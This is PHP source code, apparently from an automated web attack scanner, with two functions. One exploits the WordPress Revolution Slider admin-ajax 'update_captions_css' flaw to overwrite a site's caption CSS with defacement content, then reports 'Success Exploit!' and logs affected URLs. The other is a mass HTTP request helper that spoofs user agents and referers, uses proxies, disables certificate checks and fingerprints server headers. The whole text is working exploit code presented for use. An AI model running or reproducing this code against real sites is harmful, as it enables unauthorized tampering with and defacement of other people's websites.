function __request($__) { $curlxpl = curl_init(); curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php"); !is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL; curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom()); curl_setopt($curlxpl, CURLOPT_POST, 1); curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => $__['deface'])); curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log'); curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log'); $result = curl_exec($curlxpl) . __plus(); if (eregi('true', $result)) { $h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"; echo "[!] [INFO] Success Exploit!\n"; echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n"; __plus(); file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND); } else { echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n"; } curl_close($curlxpl); unset($curlxpl); }
function __request_info($url_, $proxy = NULL, $postDados = NULL) { $url_ = __crypt($url_); $mh = curl_multi_init(); $curl_array = array(); $nodes = is_array($url_) ? $url_ : array($url_); foreach ($nodes as $i => $url) { $curl_array[$i] = curl_init($url); __plus(); //FORMATANDO POST & EXECUTANDO urlencode EM CADA VALOR DO POST. if (not_isnull_empty($postDados) && is_array($postDados)) { foreach ($postDados as $campo => $valor) { $postDados_format .= "{$campo}=" . urlencode($valor) . '&'; } $postDados_format = rtrim($postDados_format, '&'); curl_setopt($curl_array[$i], CURLOPT_POST, count($postDados)); curl_setopt($curl_array[$i], CURLOPT_POSTFIELDS, __crypt($postDados_format)); } curl_setopt($curl_array[$i], CURLOPT_HTTPHEADER, array_merge(not_isnull_empty($_SESSION['config']['http-header']) ? explode(',', __crypt($_SESSION['config']['http-header'])) : array(), array("Cookie: disclaimer_accepted=true"))); curl_setopt($curl_array[$i], CURLOPT_USERAGENT, not_isnull_empty($_SESSION['config']['user-agent']) ? __crypt($_SESSION['config']['user-agent']) : __setUserAgentRandom()); curl_setopt($curl_array[$i], CURLOPT_REFERER, not_isnull_empty($_SESSION['config']['url-reference']) ? __crypt($_SESSION['config']['url-reference']) : __setURLReferenceRandom()); !is_null($proxy) ? curl_setopt($curl_array[$i], CURLOPT_PROXY, $proxy) : NULL; !is_null($_SESSION['config']['verifica_info']) ? curl_setopt($curl_array[$i], CURLOPT_HEADER, 1) : NULL; !is_null($_SESSION['config']['verifica_info']) && __validateOptions('3,6', $_SESSION['config']['debug']) ? curl_setopt($curl_array[$i], CURLOPT_VERBOSE, 1) : NULL; __plus(); curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl_array[$i], CURLOPT_FRESH_CONNECT, 1); curl_setopt($curl_array[$i], CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl_array[$i], CURLOPT_CONNECTTIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ? $_SESSION['config']['time-out'] : 5); curl_setopt($curl_array[$i], CURLOPT_TIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ? $_SESSION['config']['time-out'] : 5); curl_setopt($curl_array[$i], CURLOPT_COOKIEFILE, not_isnull_empty($_SESSION['config']['file-cookie']) ? $_SESSION['config']['file-cookie'] : 'cookie.txt'); curl_setopt($curl_array[$i], CURLOPT_COOKIEJAR, not_isnull_empty($_SESSION['config']['file-cookie']) ? $_SESSION['config']['file-cookie'] : 'cookie.txt'); curl_multi_add_handle($mh, $curl_array[$i]); } $running = NULL; do { usleep(100); curl_multi_exec($mh, $running); } while ($running > 0); $ret = array(); foreach ($nodes as $i => $url) { $ret[0] = curl_multi_getcontent($curl_array[$i]); $ret[1] = curl_getinfo($curl_array[$i]); $ret[2] = curl_error($curl_array[$i]); } foreach ($nodes as $i => $url) { curl_multi_remove_handle($mh, $curl_array[$i]); } $status = NULL; preg_match_all('(HTTP.*)', $ret[0], $status['http']); preg_match_all('(Server:.*)', $ret[0], $status['server']); preg_match_all('(X-Powered-By:.*)', $ret[0], $status['X-Powered-By']); __plus(); $ret[3] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}")); __debug(array('debug' => "[ BODY ]{$ret[0]}", 'function' => '__request_info'), 4); __plus(); __debug(array('debug' => "[ URL ]{$url_}", 'function' => '__request_info'), 2); __plus(); curl_multi_close($mh) . unlink('cookie.txt'); __plus(); unset($curl_array); return isset($ret[0]) ? array('corpo' => $ret[0], 'server' => $ret[1], 'error' => $ret[2], 'info' => $ret[3]) : FALSE; }